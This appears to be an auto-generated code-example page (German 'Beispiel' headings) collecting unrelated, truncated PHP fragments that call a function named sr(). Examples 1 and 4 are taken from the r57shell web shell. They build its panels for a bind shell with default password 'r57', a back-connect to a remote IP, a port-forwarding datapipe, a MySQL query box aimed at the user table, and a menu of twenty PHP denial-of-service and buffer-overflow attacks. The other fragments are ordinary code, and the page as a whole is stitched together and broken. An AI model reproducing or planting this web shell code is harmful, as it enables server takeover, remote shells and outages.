Beispiel #1
    echo sr(45, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'mysql_db', 15, !empty($_POST['mysql_db']) ? $_POST['mysql_db'] : "mysql"));
    echo sr(45, "<b>" . $lang[$language . '_text84'] . $arrow . "</b>" . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_query'), "");
    echo $te . "<div align=center id='n'><textarea cols=35 name=db_query>" . (!empty($_POST['db_query']) ? $_POST['db_query'] : "SHOW DATABASES;\nSELECT * FROM user;") . "</textarea><br>" . in('submit', 'submit', 0, $lang[$language . '_butt1']) . "</div></td>" . $fe . "</tr></div></table>";
if (!$safe_mode && !$windows) {
    echo $table_up1 . $lang[$language . '_text81'] . up_down('id21') . $table_up2 . div('id21') . $ts . "<tr>" . $fs . "<td valign=top width=34%>" . $ts;
    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text9'] . "</div></b></font>";
    echo sr(40, "<b>" . $lang[$language . '_text10'] . $arrow . "</b>", in('text', 'port', 15, '11457'));
    echo sr(40, "<b>" . $lang[$language . '_text11'] . $arrow . "</b>", in('text', 'bind_pass', 15, 'r57'));
    echo sr(40, "<b>" . $lang[$language . '_text20'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>" . in('hidden', 'dir', 0, $dir));
    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt3']));
    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text12'] . "</div></b></font>";
    echo sr(40, "<b>" . $lang[$language . '_text13'] . $arrow . "</b>", in('text', 'ip', 15, getenv('REMOTE_ADDR') ? getenv('REMOTE_ADDR') : ""));
    echo sr(40, "<b>" . $lang[$language . '_text14'] . $arrow . "</b>", in('text', 'port', 15, '11457'));
    echo sr(40, "<b>" . $lang[$language . '_text20'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>" . in('hidden', 'dir', 0, $dir));
    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt4']));
    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text22'] . "</div></b></font>";
    echo sr(40, "<b>" . $lang[$language . '_text23'] . $arrow . "</b>", in('text', 'local_port', 15, '11457'));
    echo sr(40, "<b>" . $lang[$language . '_text24'] . $arrow . "</b>", in('text', 'remote_host', 15, ''));
    echo sr(40, "<b>" . $lang[$language . '_text25'] . $arrow . "</b>", in('text', 'remote_port', 15, '6667'));
    echo sr(40, "<b>" . $lang[$language . '_text26'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\"></option><option value=\"C\">datapipe.c</option></select>" . in('hidden', 'dir', 0, $dir));
    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5']));
    echo $te . "</td>" . $fe . "</tr></div></table>";
echo '</table>' . $table_up3 . "</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=></a> | <a href=></a> | version " . $version . " ]---o</b></font></div></td></tr></table>" . $f;
include $a . $b . $c;

Beispiel #2
    $projects = array();
    foreach (scandir(SYNCMAN_PROJECTS_SETTINGS_DIR) as $item) {
        if ($item[0] == '.') {
        if (!file_exists(SYNCMAN_PROJECTS_SETTINGS_DIR . '/' . $item . '/settings.ini')) {
            echo "project '{$item}' skip - no file exists 'settings.ini' \n";
        } elseif (file_exists(SYNCMAN_PROJECTS_SETTINGS_DIR . '/' . $item . '/settings.conf.php')) {
            echo "project '{$item}' skip - file exists 'settings.conf.php' \n";
        $project = new lmbIni(SYNCMAN_PROJECTS_SETTINGS_DIR . '/' . $item . '/settings.ini');
        $projects[$item] = $project;
    return $projects;
function sr($str)
    return str_replace("'", "\\'", $str);
foreach (findAllProjects() as $name => $project) {
    $text = "<?php\n\n\$conf = array(\n";
    foreach ($project as $key => $value) {
        $text .= "  " . "'" . sr($key) . "' => '" . sr($value) . "'" . ",\n";
    $text .= ");\n";
    $dir = SYNCMAN_PROJECTS_SETTINGS_DIR . '/' . $name . '/settings.conf.php';
    file_put_contents($dir, $text);
    echo "file create: '{$dir}' \n";
Beispiel #3
            $notespercent = $trk["notepadtime"] / $trk["timeplayed"] * 100;
        $notespercent = sprintf("%.2f", $notespercent);
        sr("% of time spent writing in notepad", $notespercent . " %");
        //sr("Letters typed into notepad", "xxx");
        //sr("Role that research played in this student’s experience with the game.", "xxx");
        sr("Number of library articles accessed", $trk["libarticles"]);
        sr("Number of newspapers opened", $trk["newsarticles"]);
        sr("Amount of money this student's team raised", "\$ " . $o->teamraised);
        sr("Amount of money this student contributed to the money student's team raised", "\$ " . $o->raised);
        //sr("Amount of money student spent on Vendors", "$ $totalvendorcost");
        //sr("Week 1: Student hired $w1vendor for", "$ $w1vendorcost");
        //sr("Week 2: Student hired $w2vendor for", "$ $w2vendorcost");
        //sr("Week 3: Student hired $w3vendor for", "$ $w3vendorcost");
        //sr("Week 4: Student arrested $w4vendor", "$ $w4vendortotal");
        sr("Personal money earned", "\$ " . $trk["totalcash"]);
        //sr("Scoring info", "xxx");
        //sr("Raw Correct Answer Score", "xxx");
        //sr("Correct answer index", "xxx");
        //sr("Total choices Made", "xxx");
        //sr("Answer List for all meetings", "xxx");
        //sr("Answer List in groupings", "xxx");
        //sr("Number of times student used vendor’s contract", "xxx");
        //sr("Number of times student took wrong turn with vendor", "xxx");

        $scoretable1 = array("1-1" => 4, "1-2" => 3, "1-3" => 2, "1-4" => 1, "2-1" => 4, "2-2" => 3, "2-3" => 2, "2-4" => 1, "3-1" => 1, "3-2" => 1, "3-3" => 1, "3-4" => 4);
        $score = 0;
Beispiel #4
    echo sr(40, "<b>" . $lang[$language . '_text26'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>" . in('hidden', 'dir', 0, $dir));
    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5']));
    echo $te . "</td>" . $fe . "</tr></div></table>";
echo $table_up1 . div_title($lang[$language . '_text140'], 'id38') . $table_up2 . div('id38') . $ts . "<tr><td valign=top width=50%>" . $ts;
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>" . $lang[$language . '_text141'] . "</div></b></font>";
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos1') . in('submit', 'submit', 0, 'Recursive memory exhaustion') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos2') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ pack() ] function') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos3') . in('submit', 'submit', 0, 'BoF in [ unserialize() ] function') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos4') . in('submit', 'submit', 0, 'Limit integer calculate (65535) in ZendEngine') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos5') . in('submit', 'submit', 0, 'SQlite [ dl() ] vulnerability') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos6') . in('submit', 'submit', 0, 'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos7') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos8') . in('submit', 'submit', 0, 'Apache process killer') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos9') . in('submit', 'submit', 0, 'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos10') . in('submit', 'submit', 0, 'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)') . $fe);
echo $te . "</td><td valign=top width=50%>" . $ts;
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>" . $lang[$language . '_text141'] . "</div></b></font>";
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos11') . in('submit', 'submit', 0, 'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos12') . in('submit', 'submit', 0, 'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos13') . in('submit', 'submit', 0, 'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos14') . in('submit', 'submit', 0, 'BoF in [ str_ireplace() ] function (PHP <5.2.x)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos15') . in('submit', 'submit', 0, 'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos16') . in('submit', 'submit', 0, 'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos17') . in('submit', 'submit', 0, 'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos18') . in('submit', 'submit', 0, 'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos19') . in('submit', 'submit', 0, 'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos20') . in('submit', 'submit', 0, 'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)') . $fe);
echo $te . "</td></tr></div></table>";
echo '</table>' . $table_up3 . "</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell | version " . $version . " | <a href=></a> | <a href=></a> | <a href=>KingDefacer</a> | Generation time: " . round(getmicrotime() - starttime, 4) . " ]---o</b></font></div></td></tr></table>";
echo '</body></html>';
Beispiel #5
function se($text)
    return preg_replace('/z/', ' ', sr($text));